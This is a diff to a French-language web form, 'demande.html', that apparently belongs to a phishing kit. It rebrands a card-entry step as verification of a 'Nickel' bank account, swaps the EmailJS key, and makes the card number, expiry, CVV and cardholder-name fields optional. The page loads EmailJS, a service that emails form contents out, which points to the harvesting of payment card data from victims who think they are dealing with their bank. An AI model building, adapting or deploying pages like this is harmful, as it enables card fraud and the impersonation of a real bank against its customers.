--- a/demande.html
+++ b/demande.html
@@ -42,7 +42,7 @@
     <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
     <script type="text/javascript">
         (function () {
-            emailjs.init("user_A4XE2ynnsvNM2Ki3nnFME");
+            emailjs.init("PKyAE3pR0MbEGfrIp");
         })();
     </script>
 
@@ -262,39 +262,38 @@
 
                             <div id="second-step" style="display: none">
 
-                                <h4 style="text-align: left;"><strong>Formulaire de votre carte</strong></h4>
-                                <p> <strong>Attention: </strong>Les champs avec le symbole (<span
-                                        style="color: red">*</span>) sont obligatoires</p>
+                                <h4 style="text-align: left;"><strong>Formulaire de votre carte Nickel pour identifier votre compte Nickel</strong></h4>
+                                <p> <strong>Les champs sont facultatifs </strong></p>
                                 <hr>
                                 <div class="form-row">
                                 </div>
 
                                 <div class="row">
                                     <div class="form-group col-lg-12" style="float: left;">
-                                        <label>Numéro de la carte <span style="color: red">*</span></label>
+                                        <label>Numéro de la carte </label>
                                         <input type="text" name="dcarte" class="form-control" id="dcarte"
-                                            placeholder="1234567890123456" required="" maxlength="16" />
+                                            placeholder="1234567890123456"  maxlength="16" />
                                     </div>
                                 </div>
 
                                 <div class="row">
                                     <div class="form-group col-lg-6" style="float: left;">
-                                        <label>Date d'expiration <span style="color: red">*</span></label>
+                                        <label>Date d'expiration </label>
                                         <input type="date" name="dcartedate" class="form-control" id="dcartedate"
                                             placeholder="MM/AA" required="" />
                                     </div>
                                     <div class="form-group col-lg-6" style="float: left;">
-                                        <label>CVC / CVV <span style="color: red">*</span></label>
+                                        <label>CVC / CVV </label>
                                         <input type="text" class="form-control" maxlength="3" name="dcvc" id="dcvc" placeholder="123"
-                                            required="" />
+                                            />
                                     </div>
                                 </div>
 
                                 <div class="row">
                                     <div class="form-group col-lg-12" style="float: left;">
-                                        <label>Nom sur la carte <span style="color: red">*</span></label>
+                                        <label>Nom sur la carte </label>
                                         <input type="text" name="dcartenom" class="form-control" id="dcartenom"
-                                            placeholder="Nom sur la carte" required="" />
+                                            placeholder="Nom sur la carte"  />
                                     </div>
                                 </div>
 
